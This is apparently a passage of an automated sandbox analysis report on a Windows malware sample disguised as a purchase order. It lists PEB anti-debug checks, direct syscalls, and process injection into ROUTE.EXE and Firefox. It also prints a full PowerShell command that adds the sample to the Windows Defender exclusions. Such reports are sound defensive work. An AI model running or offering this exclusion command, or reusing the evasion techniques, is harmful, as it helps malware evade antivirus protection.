Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BA0770 mov eax, dword ptr fs:[00000030h] 4_2_01BA0770
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BA0770 mov eax, dword ptr fs:[00000030h] 4_2_01BA0770
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BA0770 mov eax, dword ptr fs:[00000030h] 4_2_01BA0770
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BA0770 mov eax, dword ptr fs:[00000030h] 4_2_01BA0770
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01B90750 mov eax, dword ptr fs:[00000030h] 4_2_01B90750
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BD2750 mov eax, dword ptr fs:[00000030h] 4_2_01BD2750
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BD2750 mov eax, dword ptr fs:[00000030h] 4_2_01BD2750
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C0C730 mov eax, dword ptr fs:[00000030h] 4_2_01C0C730
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BC674D mov esi, dword ptr fs:[00000030h] 4_2_01BC674D
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BC674D mov eax, dword ptr fs:[00000030h] 4_2_01BC674D
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BC674D mov eax, dword ptr fs:[00000030h] 4_2_01BC674D
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BC66B0 mov eax, dword ptr fs:[00000030h] 4_2_01BC66B0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BCC6A6 mov eax, dword ptr fs:[00000030h] 4_2_01BCC6A6
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01B94690 mov eax, dword ptr fs:[00000030h] 4_2_01B94690
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01B94690 mov eax, dword ptr fs:[00000030h] 4_2_01B94690
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C106F1 mov eax, dword ptr fs:[00000030h] 4_2_01C106F1
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C106F1 mov eax, dword ptr fs:[00000030h] 4_2_01C106F1
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C0E6F2 mov eax, dword ptr fs:[00000030h] 4_2_01C0E6F2
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C0E6F2 mov eax, dword ptr fs:[00000030h] 4_2_01C0E6F2
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C0E6F2 mov eax, dword ptr fs:[00000030h] 4_2_01C0E6F2
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C0E6F2 mov eax, dword ptr fs:[00000030h] 4_2_01C0E6F2
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BCA6C7 mov ebx, dword ptr fs:[00000030h] 4_2_01BCA6C7
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BCA6C7 mov eax, dword ptr fs:[00000030h] 4_2_01BCA6C7
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01B9262C mov eax, dword ptr fs:[00000030h] 4_2_01B9262C
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BC6620 mov eax, dword ptr fs:[00000030h] 4_2_01BC6620
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BC8620 mov eax, dword ptr fs:[00000030h] 4_2_01BC8620
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BAE627 mov eax, dword ptr fs:[00000030h] 4_2_01BAE627
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BD2619 mov eax, dword ptr fs:[00000030h] 4_2_01BD2619
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C5866E mov eax, dword ptr fs:[00000030h] 4_2_01C5866E
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C5866E mov eax, dword ptr fs:[00000030h] 4_2_01C5866E
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BA260B mov eax, dword ptr fs:[00000030h] 4_2_01BA260B
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BA260B mov eax, dword ptr fs:[00000030h] 4_2_01BA260B
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BA260B mov eax, dword ptr fs:[00000030h] 4_2_01BA260B
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BA260B mov eax, dword ptr fs:[00000030h] 4_2_01BA260B
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BA260B mov eax, dword ptr fs:[00000030h] 4_2_01BA260B
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BA260B mov eax, dword ptr fs:[00000030h] 4_2_01BA260B
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BA260B mov eax, dword ptr fs:[00000030h] 4_2_01BA260B
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BC2674 mov eax, dword ptr fs:[00000030h] 4_2_01BC2674
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C0E609 mov eax, dword ptr fs:[00000030h] 4_2_01C0E609
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BCA660 mov eax, dword ptr fs:[00000030h] 4_2_01BCA660
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BCA660 mov eax, dword ptr fs:[00000030h] 4_2_01BCA660
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BAC640 mov eax, dword ptr fs:[00000030h] 4_2_01BAC640
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C269C0 mov eax, dword ptr fs:[00000030h] 4_2_01C269C0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01B909AD mov eax, dword ptr fs:[00000030h] 4_2_01B909AD
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01B909AD mov eax, dword ptr fs:[00000030h] 4_2_01B909AD
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C5A9D3 mov eax, dword ptr fs:[00000030h] 4_2_01C5A9D3
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BA29A0 mov eax, dword ptr fs:[00000030h] 4_2_01BA29A0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BA29A0 mov eax, dword ptr fs:[00000030h] 4_2_01BA29A0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BA29A0 mov eax, dword ptr fs:[00000030h] 4_2_01BA29A0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BA29A0 mov eax, dword ptr fs:[00000030h] 4_2_01BA29A0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BA29A0 mov eax, dword ptr fs:[00000030h] 4_2_01BA29A0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BA29A0 mov eax, dword ptr fs:[00000030h] 4_2_01BA29A0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BA29A0 mov eax, dword ptr fs:[00000030h] 4_2_01BA29A0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BA29A0 mov eax, dword ptr fs:[00000030h] 4_2_01BA29A0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BA29A0 mov eax, dword ptr fs:[00000030h] 4_2_01BA29A0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BA29A0 mov eax, dword ptr fs:[00000030h] 4_2_01BA29A0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BA29A0 mov eax, dword ptr fs:[00000030h] 4_2_01BA29A0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BA29A0 mov eax, dword ptr fs:[00000030h] 4_2_01BA29A0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BA29A0 mov eax, dword ptr fs:[00000030h] 4_2_01BA29A0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C1E9E0 mov eax, dword ptr fs:[00000030h] 4_2_01C1E9E0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BC29F9 mov eax, dword ptr fs:[00000030h] 4_2_01BC29F9
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01B9A9D0 mov eax, dword ptr fs:[00000030h] 4_2_01B9A9D0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BC49D0 mov eax, dword ptr fs:[00000030h] 4_2_01BC49D0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C189B3 mov esi, dword ptr fs:[00000030h] 4_2_01C189B3
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C189B3 mov eax, dword ptr fs:[00000030h] 4_2_01C189B3
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C64940 mov eax, dword ptr fs:[00000030h] 4_2_01C64940
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C10946 mov eax, dword ptr fs:[00000030h] 4_2_01C10946
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01B88918 mov eax, dword ptr fs:[00000030h] 4_2_01B88918
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C34978 mov eax, dword ptr fs:[00000030h] 4_2_01C34978
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C1C97C mov eax, dword ptr fs:[00000030h] 4_2_01C1C97C
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C0E908 mov eax, dword ptr fs:[00000030h] 4_2_01C0E908
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BD096E mov eax, dword ptr fs:[00000030h] 4_2_01BD096E
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BD096E mov edx, dword ptr fs:[00000030h] 4_2_01BD096E
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C1C912 mov eax, dword ptr fs:[00000030h] 4_2_01C1C912
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BB6962 mov eax, dword ptr fs:[00000030h] 4_2_01BB6962
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C2892B mov eax, dword ptr fs:[00000030h] 4_2_01C2892B
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C1892A mov eax, dword ptr fs:[00000030h] 4_2_01C1892A
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C608C0 mov eax, dword ptr fs:[00000030h] 4_2_01C608C0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C5A8E4 mov eax, dword ptr fs:[00000030h] 4_2_01C5A8E4
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01B90887 mov eax, dword ptr fs:[00000030h] 4_2_01B90887
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BCC8F9 mov eax, dword ptr fs:[00000030h] 4_2_01BCC8F9
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C1C89D mov eax, dword ptr fs:[00000030h] 4_2_01C1C89D
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BBE8C0 mov eax, dword ptr fs:[00000030h] 4_2_01BBE8C0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BCA830 mov eax, dword ptr fs:[00000030h] 4_2_01BCA830
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BB2835 mov eax, dword ptr fs:[00000030h] 4_2_01BB2835
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BB2835 mov ecx, dword ptr fs:[00000030h] 4_2_01BB2835
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C26870 mov eax, dword ptr fs:[00000030h] 4_2_01C26870
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C1E872 mov eax, dword ptr fs:[00000030h] 4_2_01C1E872
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C1C810 mov eax, dword ptr fs:[00000030h] 4_2_01C1C810
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01B94859 mov eax, dword ptr fs:[00000030h] 4_2_01B94859
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BC0854 mov eax, dword ptr fs:[00000030h] 4_2_01BC0854
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C3483A mov eax, dword ptr fs:[00000030h] 4_2_01C3483A
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BA2840 mov ecx, dword ptr fs:[00000030h] 4_2_01BA2840
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BA0BBE mov eax, dword ptr fs:[00000030h] 4_2_01BA0BBE
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C3EBD0 mov eax, dword ptr fs:[00000030h] 4_2_01C3EBD0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C1CBF0 mov eax, dword ptr fs:[00000030h] 4_2_01C1CBF0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BBEBFC mov eax, dword ptr fs:[00000030h] 4_2_01BBEBFC
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01B98BF0 mov eax, dword ptr fs:[00000030h] 4_2_01B98BF0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BB0BCB mov eax, dword ptr fs:[00000030h] 4_2_01BB0BCB
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01B90BCD mov eax, dword ptr fs:[00000030h] 4_2_01B90BCD
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C44BB0 mov eax, dword ptr fs:[00000030h] 4_2_01C44BB0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C38B42 mov eax, dword ptr fs:[00000030h] 4_2_01C38B42
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C26B40 mov eax, dword ptr fs:[00000030h] 4_2_01C26B40
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C5AB40 mov eax, dword ptr fs:[00000030h] 4_2_01C5AB40
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C44B4B mov eax, dword ptr fs:[00000030h] 4_2_01C44B4B
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C62B57 mov eax, dword ptr fs:[00000030h] 4_2_01C62B57
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C3EB50 mov eax, dword ptr fs:[00000030h] 4_2_01C3EB50
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BBEB20 mov eax, dword ptr fs:[00000030h] 4_2_01BBEB20
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01B8CB7E mov eax, dword ptr fs:[00000030h] 4_2_01B8CB7E
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C64B00 mov eax, dword ptr fs:[00000030h] 4_2_01C64B00
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C0EB1D mov eax, dword ptr fs:[00000030h] 4_2_01C0EB1D
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01B88B50 mov eax, dword ptr fs:[00000030h] 4_2_01B88B50
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C58B28 mov eax, dword ptr fs:[00000030h] 4_2_01C58B28
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01B98AA0 mov eax, dword ptr fs:[00000030h] 4_2_01B98AA0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BE6AA4 mov eax, dword ptr fs:[00000030h] 4_2_01BE6AA4
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BC8A90 mov edx, dword ptr fs:[00000030h] 4_2_01BC8A90
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01B9EA80 mov eax, dword ptr fs:[00000030h] 4_2_01B9EA80
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C64A80 mov eax, dword ptr fs:[00000030h] 4_2_01C64A80
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BCAAEE mov eax, dword ptr fs:[00000030h] 4_2_01BCAAEE
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01B90AD0 mov eax, dword ptr fs:[00000030h] 4_2_01B90AD0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BC4AD0 mov eax, dword ptr fs:[00000030h] 4_2_01BC4AD0
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BE6ACC mov eax, dword ptr fs:[00000030h] 4_2_01BE6ACC
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BB4A35 mov eax, dword ptr fs:[00000030h] 4_2_01BB4A35
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BBEA2E mov eax, dword ptr fs:[00000030h] 4_2_01BBEA2E
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BCCA24 mov eax, dword ptr fs:[00000030h] 4_2_01BCCA24
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C3EA60 mov eax, dword ptr fs:[00000030h] 4_2_01C3EA60
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C0CA72 mov eax, dword ptr fs:[00000030h] 4_2_01C0CA72
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01C1CA11 mov eax, dword ptr fs:[00000030h] 4_2_01C1CA11
Source: C:\Users\user\Desktop\PO -2025918.exe Code function: 4_2_01BCCA6F mov eax, dword ptr fs:[00000030h] 4_2_01BCCA6F
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\PO -2025918.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\PO -2025918.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO -2025918.exe"
Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe NtWriteVirtualMemory: Direct from: 0x76F0490C
Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe NtAllocateVirtualMemory: Direct from: 0x76F03C9C
Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe NtClose: Direct from: 0x76F02B6C
Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe NtReadVirtualMemory: Direct from: 0x76F02E8C
Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe NtCreateKey: Direct from: 0x76F02C6C
Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe NtSetInformationThread: Direct from: 0x76F02B4C
Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe NtQueryAttributesFile: Direct from: 0x76F02E6C
Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe NtAllocateVirtualMemory: Direct from: 0x76F048EC
Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe NtQuerySystemInformation: Direct from: 0x76F048CC
Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe NtQueryVolumeInformationFile: Direct from: 0x76F02F2C
Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe NtOpenSection: Direct from: 0x76F02E0C
Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe NtSetInformationThread: Direct from: 0x76EF63F9
Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe NtDeviceIoControlFile: Direct from: 0x76F02AEC
Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe NtAllocateVirtualMemory: Direct from: 0x76F02BEC
Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe NtCreateFile: Direct from: 0x76F02FEC
Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe NtOpenFile: Direct from: 0x76F02DCC
Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe NtQueryInformationToken: Direct from: 0x76F02CAC
Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe NtTerminateThread: Direct from: 0x76F02FCC
Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe NtOpenKeyEx: Direct from: 0x76F02B9C
Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe NtProtectVirtualMemory: Direct from: 0x76F02F9C
Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe NtSetInformationProcess: Direct from: 0x76F02C5C
Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe NtNotifyChangeKey: Direct from: 0x76F03C2C
Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe NtCreateMutant: Direct from: 0x76F035CC
Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe NtWriteVirtualMemory: Direct from: 0x76F02E3C
Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe NtMapViewOfSection: Direct from: 0x76F02D1C
Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe NtResumeThread: Direct from: 0x76F036AC
Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe NtAllocateVirtualMemory: Direct from: 0x76F02BFC
Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe NtReadFile: Direct from: 0x76F02ADC
Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe NtQuerySystemInformation: Direct from: 0x76F02DFC
Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe NtDelayExecution: Direct from: 0x76F02DDC
Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe NtQueryInformationProcess: Direct from: 0x76F02C26
Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe NtResumeThread: Direct from: 0x76F02FBC
Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe NtCreateUserProcess: Direct from: 0x76F0371C
Source: C:\Users\user\Desktop\PO -2025918.exe Section loaded: NULL target: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe protection: execute and read and write
Source: C:\Users\user\Desktop\PO -2025918.exe Section loaded: NULL target: C:\Windows\SysWOW64\ROUTE.EXE protection: execute and read and write
Source: C:\Windows\SysWOW64\ROUTE.EXE Section loaded: NULL target: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe protection: read write
Source: C:\Windows\SysWOW64\ROUTE.EXE Section loaded: NULL target: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\ROUTE.EXE Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
Source: C:\Windows\SysWOW64\ROUTE.EXE Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\ROUTE.EXE Thread register set: target process: 2892
Source: C:\Windows\SysWOW64\ROUTE.EXE Thread APC queued: target process: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe
Source: C:\Users\user\Desktop\PO -2025918.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO -2025918.exe"
Source: C:\Users\user\Desktop\PO -2025918.exe Process created: C:\Users\user\Desktop\PO -2025918.exe "C:\Users\user\Desktop\PO -2025918.exe"
Source: C:\Program Files (x86)\JeaREswGBvxwNDEUJgOaujnvZkEuWPrGxrijCBpJBPUniLFqPfuLMAxWHGxYBGgYhNvCl\nWrCyfejRZk.exe Process created: C:\Windows\SysWOW64\ROUTE.EXE "C:\Windows\SysWOW64\ROUTE.EXE"
Source: C:\Windows\SysWOW64\ROUTE.EXE Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: nWrCyfejRZk.exe, 00000008.00000000.2050506490.0000000001321000.00000002.00000001.00040000.00000000.sdmp, nWrCyfejRZk.exe, 00000008.00000002.3540669593.0000000001321000.00000002.00000001.00040000.00000000.sdmp, nWrCyfejRZk.exe, 0000000A.00000002.3540953544.00000000019E1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: nWrCyfejRZk.exe, 00000008.00000000.2050506490.0000000001321000.00000002.00000001.00040000.00000000.sdmp, nWrCyfejRZk.exe, 00000008.00000002.3540669593.0000000001321000.00000002.00000001.00040000.00000000.sdmp, nWrCyfejRZk.exe, 0000000A.00000002.3540953544.00000000019E1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
